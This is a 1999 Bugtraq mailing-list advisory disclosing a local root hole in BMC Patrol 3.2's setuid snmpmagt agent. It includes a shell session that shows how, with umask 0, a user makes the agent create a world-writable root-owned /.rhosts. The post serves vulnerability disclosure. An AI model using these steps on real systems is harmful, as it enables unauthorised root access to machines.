[11021] in bugtraq
Root Perms Gained with Patrol SNMP Agent 3.2 (all others?)
daemon@ATHENA.MIT.EDU (Andrew Alness)
Wed Jul 14 16:02:51 1999
Message-Id: <Pine.GSO.4.10.9907131649001.21258-100000@apollo.gti.net>
Date: Tue, 13 Jul 1999 16:53:27 -0400
Reply-To: Andrew Alness <aalness@GTI.NET>
From: Andrew Alness <aalness@GTI.NET>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Problem in Patrol 3.2
---------------------
vendor:
Copyright 1993-97 BMC Software, Inc.
how bad:
local root/denial of service
example:
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al snmpmagt
-rwsr-xr-x 1 root users 185461 Mar 6 1998 snmpmagt*
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts
/.rhosts not found
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> umask 0
(first argument must be either an invalid config file or a file that doesn't exist)
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> snmpmagt yoyoyo /.rhosts
yoyoyo: No such file or directory
snmp bind failure: Address already in use
/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin/snmpmagt: error processing configuration
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts
-rw-rw-rw- 1 root users 770 Jul 13 14:42 .rhosts
note: if the file exists it keeps the same perms, otherwise creates it
with perms based on your umask and chown's to whoever owns the parent
directory of the file you're creating. if the file exists it overwrites it
with "i^A" then the result of gethostname() and some whitespace. this
problem is not platform dependent and was tested based on out of box
install on an HP.
- aalness@gti.net